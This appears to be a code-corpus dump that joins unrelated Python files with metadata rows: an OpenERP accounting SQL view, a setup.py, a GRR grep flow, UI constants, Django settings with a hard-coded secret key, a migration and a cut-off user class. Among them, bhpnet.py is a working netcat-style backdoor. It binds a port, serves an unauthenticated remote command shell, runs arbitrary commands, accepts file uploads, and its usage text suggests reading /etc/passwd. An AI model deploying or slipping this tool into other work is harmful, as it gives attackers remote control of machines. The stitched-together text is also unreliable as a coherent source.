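    # Label translations: 单据 = document, 销售订单 = sales order,
    # 收款单 = receipt, 单据日期 = document date, 单号 = document number,
    # 客户 = customer, 项目 = item, 已对账 = reconciled, 已清账 = cleared,
    # 金额 = amount, 余额 = balance, 附注 = note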
_order = 'o_date asc'
def button_view(self, cr, uid, ids, context=None):
record = self.browse(cr, uid, ids)[0]
r = {
'type': 'ir.actions.act_window',
'name': '查看单据',
'view_mode': 'form',
'view_type': 'form',
'res_model': record.ref_doc._table_name,
'res_id': record.ref_doc.id,
'target': 'new',
'context': context,
}
#if record.ref_doc._table_name == 'fg_account.bill':
# r['res_id'] = record.id - 1000000000
#
#print r
return r
class period_check(osv.osv):
_name = "fg_account.period.check"
_auto = False
_rec_name = 'ref_doc'
_columns = {
'ref_doc':fields.reference('单据', selection=[('fg_sale.order','销售订单'),('fg_account.bill','收款单')],
size=128, readonly=True),
'o_date': fields.date('单据日期', readonly=True),
'name':fields.char('单号', size=24),
'o_partner': fields.many2one('res.partner', '客户', readonly=True),
't':fields.char('项目', size=12, readonly=True),
'reconciled':fields.boolean('已对账', readonly=True),
'cleared':fields.boolean('已清账', readonly=True),
'amount': fields.float('金额', digits=(16,4), readonly=True),
'due_date_from':fields.function(lambda *a,**k:{}, method=True, type='date',string="开始日期"),
'due_date_to':fields.function(lambda *a,**k:{}, method=True, type='date',string="结束日期"),
'note':fields.text('附注'),
}
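    # Label translations as in reconcile_item above, plus: 开始日期 = start
    # date, 结束日期 = end date; elsewhere 查看单据 = view document,
    # 发货额 = shipped amount, 退货 = returns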
_order = 'o_date asc'
def button_view(self, cr, uid, ids, context=None):
record = self.browse(cr, uid, ids)[0]
r = {
'type': 'ir.actions.act_window',
'name': '查看单据',
'view_mode': 'form',
'view_type': 'form',
'res_model': record.ref_doc._table_name,
'res_id': record.id,
'target': 'new',
'context': context,
}
if record.ref_doc._table_name == 'fg_account.bill':
r['res_id'] = record.id - 1000000000
return r
def button_clear(self, cr, uid, ids, context=None):
order_obj = self.pool.get('fg_sale.order')
#this should all be order.
#check_record's id IS the id of order.
order_obj.write(cr, uid, ids, {'clear':True})
return True
def button_unclear(self, cr, uid, ids, context=None):
order_obj = self.pool.get('fg_sale.order')
#this should all be order.
#check_record's id IS the id of order.
order_obj.write(cr, uid, ids, {'clear':False})
return True
def init(self, cr):
tools.drop_view_if_exists(cr, 'fg_account_period_check')
cr.execute("""
create or replace view fg_account_period_check as (
(
SELECT
o."id" AS ID,
o.name as name,
'fg_sale.order,' || o."id" AS ref_doc,
o.date_order AS o_date,
o.partner_id AS o_partner,
'发货额' AS T,
o.reconciled AS reconciled,
SUM(line.subtotal_amount)AS amount,
o.note AS note,
o.clear as cleared
FROM
fg_sale_order_line line
JOIN fg_sale_order o ON o."id" = line.order_id
WHERE
o."state" = 'done'
AND NOT o.minus
GROUP BY
o. ID,
o."name",
o.date_confirm,
o.partner_id
)
UNION ALL
(
SELECT
o."id" AS ID,
o.name as name,
'fg_sale.order,' || o."id" AS ref_doc,
o.date_order AS o_date,
o.partner_id AS o_partner,
'退货' AS T,
o.reconciled AS reconciled,
SUM(line.subtotal_amount)AS amount,
o.note AS note,
o.clear as cleared
FROM
fg_sale_order_line line
JOIN fg_sale_order o ON o."id" = line.order_id
WHERE
o."state" = 'done'
AND o.minus
GROUP BY
o. ID,
o."name",
o.date_confirm,
o.partner_id
)
UNION ALL
(
SELECT
(bill."id"+ 1000000000) AS ID,
bill.name as name,
'fg_account.bill,' || bill."id" AS ref_doc,
bill.date_check AS o_date,
                bill.partner_id AS o_partner,
cate."name" AS T,
bill.reconciled AS reconciled,
(0-bill.amount) AS amount,
bill.note AS note,
False as cleared
FROM
fg_account_bill bill
JOIN fg_account_bill_category cate ON bill.category_id = cate. ID
WHERE
bill."state" IN('check', 'done')
)
ORDER BY id desc
)
""")
|
agpl-3.0
| -1,519,215,445,223,832,300
| 32.938202
| 105
| 0.460833
| false
| 3.477069
| false
| false
| false
|
kdschlosser/SonyAPI
|
setup.py
|
1
|
1842
|
# -*- coding: utf-8 -*-
#
# SonyAPI
# External control of Sony Bravia Generation 3 TV's
# Copyright (C) 2017 Kevin G. Schlosser
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import sys
import os
from setuptools import setup, find_packages
from SonyAPI.version import (
__version__,
__author__,
__author_email__,
__url__,
__download_url__,
__description__,
__requirements__,
__keywords__,
__classifiers__,
__license__
)
sys.path.insert(0, '.')
PACKAGE_DIR = os.path.abspath(os.path.dirname(__file__))
# Get the long description from the relevant file
with open(os.path.join(PACKAGE_DIR, 'README.txt'), 'r') as f:
__long_description__ = f.read().encode('utf-8')
setup(
name='SonyAPI',
version=__version__,
description=__description__,
long_description=__long_description__,
install_requires=__requirements__,
maintainer=__author__,
author=__author__,
author_email=__author_email__,
zip_safe=True,
packages=find_packages(),
include_package_data=True,
url=__url__,
download_url=__download_url__,
keywords=__keywords__,
classifiers=__classifiers__,
license=__license__,
)
|
gpl-2.0
| 2,833,613,687,066,089,000
| 28.238095
| 73
| 0.679696
| false
| 3.869748
| false
| false
| false
|
MiniSEC/GRR_clone
|
lib/flows/general/grep.py
|
1
|
4124
|
#!/usr/bin/env python
# Copyright 2012 Google Inc. All Rights Reserved.
"""A simple grep flow."""
import time
from grr.lib import aff4
from grr.lib import flow
from grr.lib import rdfvalue
from grr.lib import type_info
from grr.lib import utils
class Grep(flow.GRRFlow):
"""Greps a file on the client for a pattern or a regex.
This flow operates on files only, see GlobAndGrep if you want to grep a
directory.
Returns to parent flow:
RDFValueArray of BufferReference objects.
"""
category = "/Filesystem/"
XOR_IN_KEY = 37
XOR_OUT_KEY = 57
flow_typeinfo = type_info.TypeDescriptorSet(
type_info.GrepspecType(
description="The file which will be grepped.",
name="request"),
type_info.String(
description="The output collection.",
name="output",
default="analysis/grep/{u}-{t}"),
)
@flow.StateHandler(next_state=["StoreResults"])
def Start(self):
"""Start Grep flow."""
self.state.request.xor_in_key = self.XOR_IN_KEY
self.state.request.xor_out_key = self.XOR_OUT_KEY
# For literal matches we xor the search term. In the event we search the
# memory this stops us matching the GRR client itself.
if self.state.request.literal:
self.state.request.literal = utils.Xor(self.state.request.literal,
self.XOR_IN_KEY)
self.state.Register("output_collection", None)
self.CallClient("Grep", self.state.request, next_state="StoreResults")
@flow.StateHandler()
def StoreResults(self, responses):
if responses.success:
output = self.state.output.format(t=time.time(),
u=self.state.context.user)
out_urn = self.client_id.Add(output)
fd = aff4.FACTORY.Create(out_urn, "GrepResultsCollection",
mode="w", token=self.token)
self.state.output_collection = fd
if self.state.request.HasField("literal"):
self.state.request.literal = utils.Xor(self.state.request.literal,
self.XOR_IN_KEY)
fd.Set(fd.Schema.DESCRIPTION("Grep by %s: %s" % (
self.state.context.user, str(self.state.request))))
for response in responses:
response.data = utils.Xor(response.data,
self.XOR_OUT_KEY)
response.length = len(response.data)
fd.Add(response)
self.SendReply(response)
else:
self.Notify("FlowStatus", self.session_id,
"Error grepping file: %s." % responses.status)
@flow.StateHandler()
def End(self):
if self.state.output_collection is not None:
self.state.output_collection.Flush()
self.Notify("ViewObject", self.state.output_collection.urn,
u"Grep completed. %d hits" %
len(self.state.output_collection))
class GrepAndDownload(flow.GRRFlow):
"""Downloads file if a signature is found.
This flow greps a file on the client for a literal or regex and, if the
pattern is found, downloads the file.
"""
category = "/Filesystem/"
flow_typeinfo = (Grep.flow_typeinfo)
@flow.StateHandler(next_state=["DownloadFile"])
def Start(self):
self.state.request.mode = rdfvalue.GrepSpec.Mode.FIRST_HIT
self.CallFlow("Grep", request=self.state.request, next_state="DownloadFile")
@flow.StateHandler(next_state=["StoreDownload", "End"])
def DownloadFile(self, responses):
if responses:
self.Log("Grep completed with %s hits, downloading file.", len(responses))
self.CallFlow("FastGetFile", pathspec=responses.First().pathspec,
next_state="StoreDownload")
else:
self.Log("Grep did not yield any results.")
@flow.StateHandler()
def StoreDownload(self, responses):
if not responses.success:
raise flow.FlowError("Error while downloading file: %s" %
responses.status.error_message)
else:
stat = responses.First()
self.Notify("ViewObject", stat.aff4path,
"File downloaded successfully")
|
apache-2.0
| -9,200,251,228,935,758,000
| 30.968992
| 80
| 0.634336
| false
| 3.793928
| false
| false
| false
|
KelSolaar/Umbra
|
umbra/globals/ui_constants.py
|
1
|
7560
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
**ui_constants.py**
**Platform:**
Windows, Linux, Mac Os X.
**Description:**
Defines **Umbra** package ui constants through the :class:`UiConstants` class.
**Others:**
"""
from __future__ import unicode_literals
__author__ = "Thomas Mansencal"
__copyright__ = "Copyright (C) 2008 - 2014 - Thomas Mansencal"
__license__ = "GPL V3.0 - http://www.gnu.org/licenses/"
__maintainer__ = "Thomas Mansencal"
__email__ = "thomas.mansencal@gmail.com"
__status__ = "Production"
__all__ = ["UiConstants"]
class UiConstants():
"""
Defines **Umbra** package ui constants.
"""
ui_file = "Umbra.ui"
"""
:param ui_file: Application ui file.
:type ui_file: unicode
"""
processing_ui_file = "Processing.ui"
"""
:param processing_ui_file: Processing ui file.
:type processing_ui_file: unicode
"""
reporter_ui_file = "Reporter.ui"
"""
:param reporter_ui_file: Reporter ui file.
:type reporter_ui_file: unicode
"""
windows_stylesheet_file = "styles/Windows_styleSheet.qss"
"""
:param windows_stylesheet_file: Application Windows Os stylesheet file.
:type windows_stylesheet_file: unicode
"""
darwin_stylesheet_file = "styles/Darwin_styleSheet.qss"
"""
:param darwin_stylesheet_file: Application Mac Os X Os stylesheet file.
:type darwin_stylesheet_file: unicode
"""
linux_stylesheet_file = "styles/Linux_styleSheet.qss"
"""
:param linux_stylesheet_file: Application Linux Os stylesheet file.
:type linux_stylesheet_file: unicode
"""
windows_full_screen_stylesheet_file = "styles/Windows_FullScreen_styleSheet.qss"
"""
:param windows_full_screen_stylesheet_file: Application Windows Os fullscreen stylesheet file.
:type windows_full_screen_stylesheet_file: unicode
"""
darwin_full_screen_stylesheet_file = "styles/Darwin_FullScreen_styleSheet.qss"
"""
:param darwin_full_screen_stylesheet_file: Application Mac Os X Os fullscreen stylesheet file.
:type darwin_full_screen_stylesheet_file: unicode
"""
linux_full_screen_stylesheet_file = "styles/Linux_FullScreen_styleSheet.qss"
"""
:param linux_full_screen_stylesheet_file: Application Linux Os fullscreen stylesheet file.
:type linux_full_screen_stylesheet_file: unicode
"""
windows_style = "plastique"
"""
:param windows_style: Application Windows Os style.
:type windows_style: unicode
"""
darwin_style = "plastique"
"""
:param darwin_style: Application Mac Os X Os style.
:type darwin_style: unicode
"""
linux_style = "plastique"
"""
:param linux_style: Application Linux Os style.
:type linux_style: unicode
"""
settings_file = "preferences/Default_Settings.rc"
"""
:param settings_file: Application defaults settings file.
:type settings_file: unicode
"""
layouts_file = "layouts/Default_Layouts.rc"
"""
:param layouts_file: Application defaults layouts file.
:type layouts_file: unicode
"""
application_windows_icon = "images/Icon_Dark.png"
"""
:param application_windows_icon: Application icon file.
:type application_windows_icon: unicode
"""
splash_screen_image = "images/Umbra_SpashScreen.png"
"""
:param splash_screen_image: Application splashscreen image.
:type splash_screen_image: unicode
"""
logo_image = "images/Umbra_Logo.png"
"""
:param logo_image: Application logo image.
:type logo_image: unicode
"""
default_toolbar_icon_size = 32
"""
:param default_toolbar_icon_size: Application toolbar icons size.
:type default_toolbar_icon_size: int
"""
custom_layouts_icon = "images/Custom_Layouts.png"
"""
:param custom_layouts_icon: Application **Custom Layouts** icon.
:type custom_layouts_icon: unicode
"""
custom_layouts_hover_icon = "images/Custom_Layouts_Hover.png"
"""
:param custom_layouts_hover_icon: Application **Custom Layouts** hover icon.
:type custom_layouts_hover_icon: unicode
"""
custom_layouts_active_icon = "images/Custom_Layouts_Active.png"
"""
:param custom_layouts_active_icon: Application **Custom Layouts** active icon.
:type custom_layouts_active_icon: unicode
"""
miscellaneous_icon = "images/Miscellaneous.png"
"""
:param miscellaneous_icon: Application **Miscellaneous** icon.
:type miscellaneous_icon: unicode
"""
miscellaneous_hover_icon = "images/Miscellaneous_Hover.png"
"""
:param miscellaneous_hover_icon: Application **Miscellaneous** hover icon.
:type miscellaneous_hover_icon: unicode
"""
miscellaneous_active_icon = "images/Miscellaneous_Active.png"
"""
:param miscellaneous_active_icon: Application **Miscellaneous** active icon.
:type miscellaneous_active_icon: unicode
"""
development_icon = "images/Development.png"
"""
:param development_icon: Application **Development** icon.
:type development_icon: unicode
"""
development_hover_icon = "images/Development_Hover.png"
"""
:param development_hover_icon: Application **Development** hover icon.
:type development_hover_icon: unicode
"""
development_active_icon = "images/Development_Active.png"
"""
:param development_active_icon: Application **Development** active icon.
:type development_active_icon: unicode
"""
preferences_icon = "images/Preferences.png"
"""
:param preferences_icon: Application **Preferences** icon.
:type preferences_icon: unicode
"""
preferences_hover_icon = "images/Preferences_Hover.png"
"""
:param preferences_hover_icon: Application **Preferences** hover icon.
:type preferences_hover_icon: unicode
"""
preferences_active_icon = "images/Preferences_Active.png"
"""
:param preferences_active_icon: Application **Preferences** active icon.
:type preferences_active_icon: unicode
"""
startup_layout = "startup_centric"
"""
:param startup_layout: Application startup layout.
:type startup_layout: unicode
"""
help_file = "http://thomasmansencal.com/Sharing/Umbra/Support/Documentation/Help/Umbra_Manual.html"
"""
:param help_file: Application online help file.
:type help_file: unicode
"""
api_file = "http://thomasmansencal.com/Sharing/Umbra/Support/Documentation/Api/index.html"
"""
:param api_file: Application online Api file.
:type api_file: unicode
"""
development_layout = "development_centric"
"""
:param development_layout: Application development layout.
:type development_layout: unicode
"""
python_grammar_file = "grammars/Python/Python.grc"
"""
:param python_grammar_file: Python language grammar file.
:type python_grammar_file: unicode
"""
logging_grammar_file = "grammars/Logging/Logging.grc"
"""
:param logging_grammar_file: Logging language grammar file.
:type logging_grammar_file: unicode
"""
text_grammar_file = "grammars/Text/Text.grc"
"""
:param text_grammar_file: Text language grammar file.
:type text_grammar_file: unicode
"""
invalid_link_html_file = "htmls/Invalid_Link.html"
"""
:param invalid_link_html_file: Invalid link html file.
:type invalid_link_html_file: unicode
"""
crittercism_id = "5075c158d5f9b9796b000002"
"""
:param crittercism_id: Crittercism Id.
:type crittercism_id: unicode
"""
|
gpl-3.0
| 371,396,141,367,701,060
| 29.857143
| 103
| 0.667725
| false
| 3.655706
| false
| false
| false
|
kalcho83/black-hat-python
|
bhpnet.py
|
1
|
8452
|
#!/opt/local/bin/python2.7
import sys
import socket
import getopt
import threading
import subprocess
# define some global variables
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = 0
# this runs a command and returns the output
def run_command(command):
# trim the newline
command = command.rstrip()
# run the command and get the output back
try:
output = subprocess.check_output(command,stderr=subprocess.STDOUT, shell=True)
except:
output = "Failed to execute command.\r\n"
# send the output back to the client
return output
# this handles incoming client connections
def client_handler(client_socket):
global upload
global execute
global command
# check for upload
if len(upload_destination):
# read in all of the bytes and write to our destination
file_buffer = ""
# keep reading data until none is available
while True:
data = client_socket.recv(1024)
if not data:
break
else:
file_buffer += data
# now we take these bytes and try to write them out
try:
file_descriptor = open(upload_destination,"wb")
file_descriptor.write(file_buffer)
file_descriptor.close()
# acknowledge that we wrote the file out
client_socket.send("Successfully saved file to %s\r\n" % upload_destination)
except:
client_socket.send("Failed to save file to %s\r\n" % upload_destination)
# check for command execution
if len(execute):
# run the command
output = run_command(execute)
client_socket.send(output)
# now we go into another loop if a command shell was requested
if command:
while True:
# show a simple prompt
client_socket.send("<BHP:#> ")
# now we receive until we see a linefeed (enter key)
cmd_buffer = ""
while "\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024)
# we have a valid command so execute it and send back the results
response = run_command(cmd_buffer)
# send back the response
client_socket.send(response)
# this is for incoming connections
def server_loop():
global target
global port
# if no target is defined we listen on all interfaces
if not len(target):
target = "0.0.0.0"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target,port))
server.listen(5)
while True:
client_socket, addr = server.accept()
# spin off a thread to handle our new client
client_thread = threading.Thread(target=client_handler,args=(client_socket,))
client_thread.start()
# if we don't listen we are a client....make it so.
def client_sender(buffer):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# connect to our target host
client.connect((target,port))
# if we detect input from stdin send it
# if not we are going to wait for the user to punch some in
if len(buffer):
client.send(buffer)
while True:
# now wait for data back
recv_len = 1
response = ""
while recv_len:
data = client.recv(4096)
recv_len = len(data)
response+= data
if recv_len < 4096:
break
print response,
# wait for more input
buffer = raw_input("")
buffer += "\n"
# send it off
client.send(buffer)
except:
# just catch generic errors - you can do your homework to beef this up
print "[*] Exception! Exiting."
# teardown the connection
client.close()
def usage():
print "Netcat Replacement"
print
print "Usage: bhpnet.py -t target_host -p port"
print "-l --listen - listen on [host]:[port] for incoming connections"
print "-e --execute=file_to_run - execute the given file upon receiving a connection"
print "-c --command - initialize a command shell"
print "-u --upload=destination - upon receiving connection upload a file and write to [destination]"
print
print
print "Examples: "
print "bhpnet.py -t 192.168.0.1 -p 5555 -l -c"
print "bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"
print "bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\""
print "echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135"
sys.exit(0)
def main():
global listen
global port
global execute
global command
global upload_destination
global target
if not len(sys.argv[1:]):
usage()
# read the commandline options
try:
        # long options that take a value need a trailing '='
        opts, args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:",["help","listen","execute=","target=","port=","command","upload="])
except getopt.GetoptError as err:
print str(err)
usage()
for o,a in opts:
if o in ("-h","--help"):
usage()
elif o in ("-l","--listen"):
listen = True
elif o in ("-e", "--execute"):
execute = a
elif o in ("-c", "--commandshell"):
command = True
elif o in ("-u", "--upload"):
upload_destination = a
elif o in ("-t", "--target"):
target = a
elif o in ("-p", "--port"):
port = int(a)
else:
assert False,"Unhandled Option"
# are we going to listen or just send data from stdin
if not listen and len(target) and port > 0:
# read in the buffer from the commandline
# this will block, so send CTRL-D if not sending input
# to stdin
buffer = sys.stdin.read()
# send data off
client_sender(buffer)
# we are going to listen and potentially
# upload things, execute commands and drop a shell back
# depending on our command line options above
if listen:
server_loop()
if __name__ == "__main__":
    main()
|
gpl-3.0
| -4,140,704,907,797,089,300
| 34.074689
| 133
| 0.428064
| false
| 5.520575
| false
| false
| false
|
callowayproject/django-massmedia
|
example/settings.py
|
1
|
4213
|
# Django settings for example project.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
import os
import sys
APP = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
PROJ_ROOT = os.path.abspath(os.path.dirname(__file__))
sys.path.append(APP)
ADMINS = (
# ('Your Name', 'your_email@domain.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'dev.db', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = os.path.abspath(os.path.join(PROJ_ROOT, 'media', 'uploads'))
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = '/uploads/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = os.path.abspath(os.path.join(PROJ_ROOT, 'media', 'static'))
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'g2_39yupn*6j4p*cg2%w643jiq-1n_annua*%i8+rq0dx9p=$n'
ROOT_URLCONF = 'example.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(PROJ_ROOT, 'templates'),
)
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.staticfiles',
'massmedia',
'django.contrib.flatpages',
'testapp',
'mathfilters',
)
MIDDLEWARE_CLASSES = [
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
MMEDIA_IMAGE_STORAGE = 'media_storage.MediaStorage'
MASSMEDIA_SERVICES = {
'YOUTUBE': {
'EMAIL': '',
'USERNAME': '',
'PASSWORD': '',
},
}
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
|
apache-2.0
| -6,627,286,543,488,898,000
| 32.975806
| 123
| 0.688346
| false
| 3.555274
| false
| false
| false
|
liamneath1/hailey.io
|
hailey_web/hailey_api/migrations/0001_initial.py
|
1
|
1312
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-05-14 22:41
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='StockMarket',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ticker_code', models.CharField(max_length=20)),
('index_code', models.IntegerField()),
('date', models.DateField()),
('open_price', models.FloatField()),
('close_price', models.FloatField(blank=True, null=True)),
('high_price', models.FloatField(blank=True, null=True)),
('low_price', models.FloatField(blank=True, null=True)),
('volume', models.FloatField(blank=True, null=True)),
('misc', models.TextField(blank=True, null=True)),
],
options={
'db_table': 'stockmarket',
},
),
migrations.AlterUniqueTogether(
name='stockmarket',
unique_together=set([('ticker_code', 'index_code', 'date')]),
),
]
|
mit
| 1,092,914,653,890,573,000
| 33.526316
| 114
| 0.539634
| false
| 4.373333
| false
| false
| false
|
macedir/Software-Development
|
Python/P1.py
|
1
|
1648
|
# KYLE'S CHANGE COUNTER VERSION 1000
# INCLUDES UNSOLVABLE PENNY ERROR
import math
dict = {
100: 'hundred dollar bill',
50: 'fifty dollar bill',
20: 'twenty dollar bill',
10: 'ten dollar bill',
5: 'five dollar bill',
2: 'toonie',
1: 'loonie',
.25: 'quarter',
.10: 'dime',
.05: 'nickel',
.01: 'penny'
}
newDict = {}
##target = 999.99
##wl = target
while True:
print(' ')
inputamnt = input("How much? ")
try:
wl = float(inputamnt)
target = wl
def determineAmount(work, factor):
amountReq = work // factor
#amountReqFull = amountReq * factor
return amountReq
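# e.g. determineAmount(7.30, 2) -> 3.0 (three toonies fit into $7.30)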
print('For $' + str(target) + ', you will need:')
for k in sorted(dict, reverse = True):
workInt = math.floor((determineAmount(wl, k)))
wl = (wl - (workInt*k))
newDict[k] = workInt
if workInt != 0:
if k != .01:
if workInt > 1:
print(str(workInt) + ' ' + dict[k] + 's')
else:
print(str(workInt) + ' ' + dict[k])
elif workInt > 1:
print(str(workInt) + ' pennies')
else:
print(str(workInt) + ' penny')
print(' ')
print('Margin of error of +-1 penny\n------------------------------')
except ValueError:
print('That is not a number\n------------------------------\n')
|
gpl-3.0
| 3,040,184,352,776,137,700
| 27.428571
| 77
| 0.426578
| false
| 3.806005
| false
| false
| false
|
xmendez/wfuzz
|
src/wfuzz/factories/fuzzresfactory.py
|
1
|
4150
|
import copy
from .fuzzfactory import reqfactory
from .payman import payman_factory
from ..fuzzobjects import FuzzResult, FuzzType, FuzzWord, FuzzWordType
from ..helpers.obj_factory import ObjectFactory, SeedBuilderHelper
class FuzzResultFactory(ObjectFactory):
def __init__(self):
ObjectFactory.__init__(
self,
{
"fuzzres_from_options_and_dict": FuzzResultDictioBuilder(),
"fuzzres_from_allvar": FuzzResultAllVarBuilder(),
"fuzzres_from_recursion": FuzzResRecursiveBuilder(),
"seed_from_recursion": SeedRecursiveBuilder(),
"seed_from_options": SeedResultBuilder(),
"seed_from_options_and_dict": FuzzResultDictSeedBuilder(),
"baseline_from_options": BaselineResultBuilder(),
},
)
class FuzzResultDictioBuilder:
def __call__(self, options, dictio_item):
res = copy.deepcopy(options["compiled_seed"])
res.item_type = FuzzType.RESULT
res.discarded = False
res.payload_man.update_from_dictio(dictio_item)
res.update_from_options(options)
SeedBuilderHelper.replace_markers(res.history, res.payload_man)
res.nres = next(FuzzResult.newid)
return res
class SeedResultBuilder:
def __call__(self, options):
seed = reqfactory.create("seed_from_options", options)
res = FuzzResult(seed)
res.payload_man = payman_factory.create("payloadman_from_request", seed)
return res
class BaselineResultBuilder:
def __call__(self, options):
raw_seed = reqfactory.create("request_from_options", options)
baseline_payloadman = payman_factory.create(
"payloadman_from_baseline", raw_seed
)
if baseline_payloadman.payloads:
res = FuzzResult(raw_seed)
res.payload_man = baseline_payloadman
res.update_from_options(options)
res.is_baseline = True
SeedBuilderHelper.replace_markers(raw_seed, baseline_payloadman)
return res
else:
return None
class FuzzResultAllVarBuilder:
def __call__(self, options, var_name, payload):
fuzzres = copy.deepcopy(options["compiled_seed"])
fuzzres.item_type = FuzzType.RESULT
fuzzres.discarded = False
fuzzres.payload_man = payman_factory.create("empty_payloadman", payload)
fuzzres.payload_man.update_from_dictio([payload])
fuzzres.history.wf_allvars_set = {var_name: payload.content}
fuzzres.nres = next(FuzzResult.newid)
return fuzzres
class FuzzResultDictSeedBuilder:
def __call__(self, options, dictio):
fuzzres = copy.deepcopy(dictio[0].content)
fuzzres.history.update_from_options(options)
fuzzres.update_from_options(options)
fuzzres.payload_man = payman_factory.create("empty_payloadman", dictio[0])
fuzzres.payload_man.update_from_dictio(dictio)
return fuzzres
class SeedRecursiveBuilder:
def __call__(self, seed):
new_seed = copy.deepcopy(seed)
new_seed.history.url = seed.history.recursive_url + "FUZZ"
new_seed.rlevel += 1
if new_seed.rlevel_desc:
new_seed.rlevel_desc += " - "
new_seed.rlevel_desc += seed.payload_man.description()
new_seed.item_type = FuzzType.SEED
new_seed.discarded = False
new_seed.payload_man = payman_factory.create(
"payloadman_from_request", new_seed.history
)
return new_seed
class FuzzResRecursiveBuilder:
def __call__(self, seed, url):
fr = copy.deepcopy(seed)
fr.history.url = str(url)
fr.rlevel = seed.rlevel + 1
if fr.rlevel_desc:
fr.rlevel_desc += " - "
fr.rlevel_desc += seed.payload_man.description()
fr.item_type = FuzzType.BACKFEED
fr.discarded = False
fr.is_baseline = False
fr.payload_man = payman_factory.create(
"empty_payloadman", FuzzWord(url, FuzzWordType.WORD)
)
return fr
resfactory = FuzzResultFactory()
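# Usage sketch (assuming an options dict with a compiled seed, as the builders above expect):
#   res = resfactory.create("seed_from_options", options)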
|
gpl-2.0
| -3,708,989,993,210,402,300
| 31.170543
| 82
| 0.630361
| false
| 3.608696
| false
| false
| false
|
WayStudios/fora
|
fora/core/user.py
|
1
|
3473
|
# fora
# class User
# Xu [xw901103@gmail.com] Copyright 2015
from fora.core.dbsession import (
DBSession,
OR
)
from fora.models.user import UserModel
import uuid
from datetime import datetime
class User(object):
""" This class contains core functionality of fora user manipulation.
"""
model = None
def __init__(self):
self.model = None
def exists(self):
return self.model is not None
def is_guest(self):
return self.model is None
def id(self):
return self.model.id
def uuid(self, new_uuid = None):
if not new_uuid:
return self.model.uuid
self.model.uuid = new_uuid
def email_address(self, new_email_address = None):
if not new_email_address:
return self.model.email_address
self.model.email_address = new_email_address
def username(self, new_username = None):
if not new_username:
return self.model.username
self.model.username = new_username
def password(self, new_password = None):
if not new_password:
return self.model.password
self.model.password = new_password
def is_active(self, new_is_active = None):
if new_is_active == None:
return self.model.is_active
self.model.is_active = new_is_active
def is_deleted(self, new_is_deleted = None):
if new_is_deleted == None:
return self.model.is_deleted
self.model.is_deleted = new_is_deleted
def create_date(self, new_create_date = None):
if not new_create_date:
return self.model.create_date
self.model.create_date = new_create_date
def update_date(self, new_update_date = None):
if not new_update_date:
return self.model.update_date
self.model.update_date = new_update_date
@staticmethod
def get_user_by_uuid(uuid):
result = DBSession.query(UserModel).filter(UserModel.uuid == uuid).first()
obj = User()
obj.model = result
return obj
